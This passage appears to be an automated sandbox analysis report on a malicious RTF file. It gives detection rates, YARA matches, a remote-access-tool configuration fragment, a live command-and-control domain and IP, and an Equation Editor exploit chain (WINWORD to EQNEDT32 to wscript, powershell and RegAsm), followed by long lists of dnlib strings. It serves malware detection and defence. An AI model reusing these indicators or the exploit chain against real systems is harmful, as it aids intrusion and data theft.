"Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
              Source: cavps7.duckdns.orgVirustotal: Detection: 8%Perma Link
              Source: MKWbWHd5Ni.rtfReversingLabs: Detection: 52%
              Source: MKWbWHd5Ni.rtfVirustotal: Detection: 61%Perma Link
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.886651440.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.886651440.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3728, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,9_2_00433837
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_00406A63 CryptUnprotectData,LoadLibraryA,GetProcAddress,CryptUnprotectData,9_2_00406A63
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404423 FreeLibrary,CryptUnprotectData,11_2_00404423
              Source: powershell.exe, 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_c77afcfd-a

              Exploits

              barindex
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.powershell.exe.3b90b60.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.381523200.0000000003729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3728, type: MEMORYSTR
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 51.83.251.113 Port: 80Jump to behavior
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

              Privilege Escalation

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_004074FD _wcslen,CoGetObject,9_2_004074FD
              Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.22:49166 version: TLS 1.0
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.380562740.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.380118377.00000000002A9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.380562740.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.380118377.00000000002A9000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.pdb source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000008.00000002.383513516.0000000006330000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000008.00000002.381523200.0000000004129000.00000004.00000800.00020000.00000000.sdmp
